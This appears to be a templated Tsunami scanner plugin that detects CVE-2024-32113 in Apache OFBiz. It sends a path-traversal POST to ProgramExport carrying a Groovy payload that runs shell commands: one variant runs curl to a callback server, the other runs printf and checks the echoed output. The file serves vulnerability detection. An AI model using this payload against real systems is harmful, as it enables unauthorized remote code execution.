# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "ApacheOfbiz_CVE_2024_32113"
  author: 
    "Robert Dick (robert@doyensec.com) for templated version, "
    "Ryan Beltran (ryanbeltran@google.com) for original Java version"
  version: "2.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE_2024_32113"
  }
  severity: CRITICAL
  title: "CVE-2024-32113 Remote code execution vulnerability in Apache OFBiz"
  description: 
    "The scanner detected that attackers can execute arbitrary code on the server via restricted"
    " endpoints without authorization"
  recommendation:
    "Upgrade to Apache OFBiz patched version 18.12.13."
  related_id: {
    publisher: "CVE"
    value: "CVE-2024-32113"
  }
}

###########
# ACTIONS #
###########

# original didn't have this but we include it just in case to reduce false positives

actions: {
  name: "fingerprint_ofbiz"
  http_request: {
    method: GET
    uri: "/webtools/control/main"
    response: {
      expect_all: {
        conditions: [
          { body: {} contains: "OFBiz" }
        ]
      }
    }
  }
}

actions: {
  name: "execute_payload"
  http_request: {
    method: POST
    uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
    headers: [
      { name: "Content-Type" value: "application/x-www-form-urlencoded" }
    ]
    data: 
      'groovyProgram=throw%20new%20Exception%28%27curl%20{{ T_CBS_URI }}%27.execute%28%29.text%29%3b'
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 1000 } }
}

actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}

# reflective one for if the callback server is disabled

actions: {
  name: "execute_payload_reflective"
  http_request: {
    method: POST
    uri: "/webtools/control/forgotPassword/foo/../ProgramExport"
    headers: [
      { name: "Content-Type" value: "application/x-www-form-urlencoded" }
    ]
    data: 
      'groovyProgram=throw%20new%20Exception%28%27printf%20%25x%20133713371337%27.execute%28%29.text%29%3b'
    response: {
      http_status: 200
      expect_all: {
        conditions: [
          { body: {} contains: "1f21f020c9" }
        ]
      }
    }
  }
}

#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  actions: [
    "fingerprint_ofbiz",
    "execute_payload",
    "sleep",
    "check_callback_server_logs"
  ]
}

workflows: {
  actions: [
    "fingerprint_ofbiz",
    "execute_payload_reflective"
  ]
}
